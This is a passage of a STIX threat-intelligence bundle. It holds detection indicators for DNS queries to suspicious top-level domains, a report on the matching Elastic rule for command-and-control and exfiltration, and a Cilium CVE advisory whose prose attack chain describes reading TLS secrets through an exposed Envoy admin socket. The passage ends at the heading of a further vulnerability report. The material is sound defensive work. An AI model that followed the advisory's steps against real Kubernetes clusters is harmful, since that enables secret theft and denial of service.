      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e05725f9-6448-5872-b513-2dd7bb73fd40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--370d9d28-4878-5066-b3ec-2a54626a0505"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f9af95a9-38fd-53f5-87a0-1ae845d06742",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .tk",
      "pattern": "[domain-name:value = '.tk']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f005c1f9-f644-5d16-8fa4-7373fecd7259",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--f9af95a9-38fd-53f5-87a0-1ae845d06742"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0056c77d-6f37-5743-b28a-da622ed49a6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .shop",
      "pattern": "[domain-name:value = '.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d59e81d6-aabb-5e3e-9882-6bf19f30113e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--0056c77d-6f37-5743-b28a-da622ed49a6a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7d3beae2-08ea-52a5-a1fe-a64860f24ff3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .club",
      "pattern": "[domain-name:value = '.club']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e4402cb1-d96e-5a1f-ae2f-4e8134be3868",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--7d3beae2-08ea-52a5-a1fe-a64860f24ff3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c791d843-ddb0-530d-9fb5-8b98a12e3a12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .icu",
      "pattern": "[domain-name:value = '.icu']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0113e8bb-d390-510b-b603-a67c267f4d77",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--c791d843-ddb0-530d-9fb5-8b98a12e3a12"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b6f58d57-a3fb-54f0-8d0f-b7cb1854962a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .pw",
      "pattern": "[domain-name:value = '.pw']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2cf4b486-ec85-50f5-a046-ecc3da523acf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--b6f58d57-a3fb-54f0-8d0f-b7cb1854962a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--85a78c4d-50fa-5039-90de-4439f35e9954",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .ws",
      "pattern": "[domain-name:value = '.ws']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0b62e442-761e-53c1-b66f-9c897465b1e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--85a78c4d-50fa-5039-90de-4439f35e9954"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--76b9d216-c36e-53e3-a01f-e16c122bbbc8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .fun",
      "pattern": "[domain-name:value = '.fun']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7f65b52c-bacc-5b2e-abca-20c72b31c7cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--76b9d216-c36e-53e3-a01f-e16c122bbbc8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a64c1d4d-a5ed-54a5-9ba1-d625a31f0c0a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .life",
      "pattern": "[domain-name:value = '.life']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb365215-85c2-5bea-a7de-441cfcb985ec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--a64c1d4d-a5ed-54a5-9ba1-d625a31f0c0a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--328666c7-3cfe-55f2-9b42-91ae908521a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .boats",
      "pattern": "[domain-name:value = '.boats']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d76ee570-c6cd-5bd7-b693-c5856b806b2e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--328666c7-3cfe-55f2-9b42-91ae908521a6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a94228e3-7c21-5cff-a8db-d1b70316a6e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .store",
      "pattern": "[domain-name:value = '.store']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b1b32643-3670-535f-ac94-c12fcbfce54f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--a94228e3-7c21-5cff-a8db-d1b70316a6e5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--adc89f96-3b06-53cf-abcd-c7317fa3a16f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .hair",
      "pattern": "[domain-name:value = '.hair']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b848a248-dd62-5560-bf15-55b02c7c7eeb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--adc89f96-3b06-53cf-abcd-c7317fa3a16f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6deef16c-9e09-571e-9072-90e8ab1f6190",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .mom",
      "pattern": "[domain-name:value = '.mom']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--69720a99-7654-56ea-8d55-fc7ea75704be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--6deef16c-9e09-571e-9072-90e8ab1f6190"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f9d8bee8-3646-55d3-b69e-35241a339331",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .beauty",
      "pattern": "[domain-name:value = '.beauty']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d332ee07-d5fa-569c-85a8-7ae7856c68c4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--f9d8bee8-3646-55d3-b69e-35241a339331"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c8601551-9df6-5b80-b08c-4b3a8c3f683a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .bond",
      "pattern": "[domain-name:value = '.bond']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3be5eec8-64d5-5f9b-a185-8a2d31cb7e00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--c8601551-9df6-5b80-b08c-4b3a8c3f683a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3d730ab0-e6b1-55f8-a696-912945e3594e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .biz",
      "pattern": "[domain-name:value = '.biz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e70a738c-7826-53e8-8185-5026762ada68",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--3d730ab0-e6b1-55f8-a696-912945e3594e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b4ae23e4-83cf-56a4-89a4-f4bb3ee205ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .live",
      "pattern": "[domain-name:value = '.live']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--639d2db6-79a3-53da-860d-2f76cb2956f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--b4ae23e4-83cf-56a4-89a4-f4bb3ee205ce"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b940665c-b36a-5482-a514-168d670b006f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .zone",
      "pattern": "[domain-name:value = '.zone']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bd86d88f-ee19-5e19-ba2a-da1b7cb7f820",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--b940665c-b36a-5482-a514-168d670b006f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93e1a2d7-2878-5e97-b9fe-b670af113950",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Proxy",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1090",
          "url": "https://attack.mitre.org/techniques/T1090"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7af6e2c0-00ac-5e3b-b8b1-fc150555d631",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1102",
          "url": "https://attack.mitre.org/techniques/T1102"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4a5c1e42-8cc8-5641-ac35-238a311658fe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c2b690d8-4f77-5197-9bb3-2ef39b55fea6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Dynamic Resolution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1568",
          "url": "https://attack.mitre.org/techniques/T1568"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--19a95def-72e8-5059-9b94-88271fa5cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "attack-pattern--c2b690d8-4f77-5197-9bb3-2ef39b55fea6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--98137804-c9b5-56b9-82f6-67a34499c412",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of DNS Queries to Suspicious Top-Level Domains",
      "description": "## Overview\n\nThis brief details a detection rule from Elastic designed to identify suspicious DNS queries originating from Linux systems. The rule targets a broad list of top-level domains (TLDs) that are frequently abused by threat actors for various malicious purposes. These TLDs, such as .ru, .xyz, .top, .info, and many others, are common choices for hosting command and control (C2) infrastructure, facilitating data exfiltration, or serving as staging grounds for downloading additional malware payloads. The goal of this detection is to provide early warning of potential compromises or ongoing malicious activities by flagging communications with infrastructure known for its illicit use. Defenders can deploy this rule to monitor network traffic for anomalous outbound connections from Linux endpoints, thereby enhancing their ability to detect and respond to covert attacker communications.\n\n## Attack Chain\n\n(No specific attack chain is documented in the source. This detection focuses on identifying post-compromise network behaviors rather than initial access or specific exploitation.)\n\n## Impact\n\nFailure to detect and block DNS queries to suspicious TLDs can lead to significant consequences for an organization. If a compromised Linux system successfully establishes command and control (C2) with attacker infrastructure, it enables persistent access, further exploitation, data exfiltration, or the deployment of ransomware. The impact can range from data breaches and intellectual property theft to complete network disruption and financial losses. Early detection of such communication attempts is crucial to prevent the progression of an attack and mitigate potential damage, which could otherwise affect any system within the network communicating with these domains.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM and tune it for your Linux environment, prioritizing critical servers and workstations.\n*   Ensure DNS logging is enabled for all Linux endpoints, capturing `dns.question.name`, `host.os.type`, and `process.name` to activate the rule effectively.\n*   Consider implementing network egress filtering to restrict outbound DNS queries to only known, legitimate TLDs or internal DNS resolvers.\n*   Investigate all alerts generated by the \"DNS Request to Suspicious Top Level Domain\" rule by examining the source process and the full domain name for context.\n",
      "published": "2026-07-06T17:29:03Z",
      "labels": [
        "command-and-control",
        "exfiltration",
        "linux",
        "dns"
      ],
      "object_refs": [
        "indicator--0b21e109-0d73-5028-8339-5d74e4e986ba",
        "indicator--45d0a6b3-c8fe-5b7b-8ae5-a18017414c24",
        "indicator--f25f9cc7-c1a4-5377-8cef-acb12b19be45",
        "indicator--2d04d72a-5d61-5964-9c29-6d5d97d80bfa",
        "indicator--ce02435a-7d6c-5ae8-aecc-9c1abd82675d",
        "indicator--e1a92039-d35c-5e69-8c43-1a94652f9be4",
        "indicator--e694e3a4-460a-5695-98fa-6281c4ced8d8",
        "indicator--df1de1d3-1b8c-5860-8765-885b24aeddb1",
        "indicator--7c90d3e9-d94e-5ad4-8bed-367c175a20c3",
        "indicator--dc2908ed-565f-5a98-90e9-024945286c49",
        "indicator--227dcf2b-2ab0-56cb-a84e-27ffde906d33",
        "indicator--a446ffb0-fd89-5476-80ad-592339428f66",
        "indicator--0cb8fd78-7b14-5d6c-ab80-257796ba2e0c",
        "indicator--a8758301-8778-50e4-91bc-c1f5b10782f3",
        "indicator--2ed3d325-5c34-55d6-8afe-10e163a99623",
        "indicator--578bda4f-bbf8-5971-a416-08239b431d30",
        "indicator--0134520f-eadb-55f0-9f0a-782f3f1932c5",
        "indicator--ab1efc31-0997-5095-a4d5-d6f76dfbf197",
        "indicator--b8543ab5-e0eb-5393-be19-62a6bc7c7a85",
        "indicator--04d945b7-053b-57ad-bf76-da8125213585",
        "indicator--9f7053c9-6ba1-5fed-935e-216f6eeea5e8",
        "indicator--4d3e1305-1992-5392-a2eb-494f1447c19c",
        "indicator--aed74d9a-beb7-57e2-965b-cf2711c7cfe0",
        "indicator--132695cb-4832-5e7c-97e4-1f9831a1ca87",
        "indicator--59d51733-8c47-5032-9fcb-f8fb41cb70d5",
        "indicator--50217469-c93b-572c-a523-8defd371e97b",
        "indicator--b3928a2b-8d5f-51ba-a9eb-1479e107c5c5",
        "indicator--c1ca8275-e41b-51f7-a140-b7e2a4ac583a",
        "indicator--33cec719-a629-56c7-a80c-dcdb370345a9",
        "indicator--f147c2f6-3953-5840-ac1c-b15391477d06",
        "indicator--9c76e86f-271c-5234-8c43-8779f714f640",
        "indicator--2db2a174-5d4f-5195-9621-add3b8e100be",
        "indicator--370d9d28-4878-5066-b3ec-2a54626a0505",
        "indicator--f9af95a9-38fd-53f5-87a0-1ae845d06742",
        "indicator--0056c77d-6f37-5743-b28a-da622ed49a6a",
        "indicator--7d3beae2-08ea-52a5-a1fe-a64860f24ff3",
        "indicator--c791d843-ddb0-530d-9fb5-8b98a12e3a12",
        "indicator--b6f58d57-a3fb-54f0-8d0f-b7cb1854962a",
        "indicator--85a78c4d-50fa-5039-90de-4439f35e9954",
        "indicator--76b9d216-c36e-53e3-a01f-e16c122bbbc8",
        "indicator--a64c1d4d-a5ed-54a5-9ba1-d625a31f0c0a",
        "indicator--328666c7-3cfe-55f2-9b42-91ae908521a6",
        "indicator--a94228e3-7c21-5cff-a8db-d1b70316a6e5",
        "indicator--adc89f96-3b06-53cf-abcd-c7317fa3a16f",
        "indicator--6deef16c-9e09-571e-9072-90e8ab1f6190",
        "indicator--f9d8bee8-3646-55d3-b69e-35241a339331",
        "indicator--c8601551-9df6-5b80-b08c-4b3a8c3f683a",
        "indicator--3d730ab0-e6b1-55f8-a696-912945e3594e",
        "indicator--b4ae23e4-83cf-56a4-89a4-f4bb3ee205ce",
        "indicator--b940665c-b36a-5482-a514-168d670b006f",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
        "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426",
        "attack-pattern--c2b690d8-4f77-5197-9bb3-2ef39b55fea6",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/command_and_control_dns_query_to_sus_top_level_domain.toml"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Credentials from Password Stores",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3085aa46-2ac2-5490-b827-ebff5774701d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fe0d6d92-5828-5d9d-8aae-80984ea808ba",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad363375-ed5d-518b-8369-b158069abab4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fe0d6d92-5828-5d9d-8aae-80984ea808ba",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fe0d6d92-5828-5d9d-8aae-80984ea808ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Cilium L7 Envoy Admin Socket Vulnerability (CVE-2026-49445)",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-49445, has been identified in Cilium, a widely used open-source networking, observability, and security solution for Kubernetes. The issue arises when Cilium's Layer 7 (L7) functionality is enabled, causing the underlying Envoy proxy instance to create a world-accessible administration socket on cluster nodes. This misconfiguration allows any local attacker who has gained access to a node to exploit the Envoy admin endpoints. Such exploitation can result in the disclosure of sensitive data, including TLS secrets, and significant operational impact, such as disrupting cluster traffic or forcibly terminating the Envoy process. The vulnerability affects Cilium versions 1.19.0 to 1.19.1, 1.18.0 to 1.18.7, and all versions prior to 1.17.14, and there is currently no known workaround. Patches have been released in versions 1.19.2, 1.18.8, and 1.17.14.\n\n## Attack Chain\n\n1.  An attacker first gains local access to a Kubernetes cluster node where Cilium is deployed.\n2.  The node is running a vulnerable version of Cilium with L7 functionality enabled, causing an Envoy proxy instance to be deployed.\n3.  The Envoy instance, due to the misconfiguration, creates a world-accessible Unix domain socket for its administration interface.\n4.  The local attacker discovers and accesses this world-accessible Envoy admin socket.\n5.  The attacker then leverages the accessible admin endpoints to query for sensitive configuration data, such as TLS secrets.\n6.  Alternatively, the attacker utilizes the admin endpoints to issue commands that disrupt network traffic within the cluster.\n7.  The attacker might also terminate the Envoy process, leading to a denial of service for L7-managed traffic.\n8.  The final objective is either information exfiltration (e.g., TLS secrets) or denial of service to cluster resources.\n\n## Impact\n\nThis vulnerability poses a critical threat to the confidentiality and availability of Kubernetes clusters using Cilium with L7 functionality. Exploitation by a local attacker can directly lead to the exposure of highly sensitive information, such as TLS private keys, which could then be used for decrypting network communications, impersonating services, or escalating privileges. Beyond data theft, the attacker can disrupt or completely halt network traffic managed by Envoy, causing a denial of service for critical applications and services running within the cluster. Terminating the Envoy process directly impacts service availability. All deployment models, including embedded and standalone Envoy, are affected, increasing the potential blast radius across diverse Cilium installations. The source does not provide specific victim counts but highlights significant consequences for any affected organization.\n\n## Recommendation\n\n*   Immediately upgrade all affected Cilium installations to a patched version (v1.19.2, v1.18.8, or v1.17.14) to remediate CVE-2026-49445.\n*   Implement robust host-level security measures to prevent unauthorized local access to Kubernetes cluster nodes, thereby mitigating the prerequisite for this local exploitation.\n",
      "published": "2026-07-06T17:08:10Z",
      "labels": [
        "vulnerability",
        "kubernetes",
        "container",
        "cilium",
        "envoy",
        "local-privilege-escalation",
        "information-disclosure",
        "denial-of-service",
        "misconfiguration"
      ],
      "object_refs": [
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-3fcv-jvfp-m4q9"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/cilium/cilium/pull/44512"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7379ba6b-a822-5582-888a-9fa81fd270ac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b984d387-6f77-5a8d-b02f-fa7d093eb9c3",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--826b937d-0ac0-511d-937e-4ac51bf0769b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b984d387-6f77-5a8d-b02f-fa7d093eb9c3",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b984d387-6f77-5a8d-b02f-fa7d093eb9c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Formie Hidden Field SSTI Vulnerability (CVE-2026-52889)",
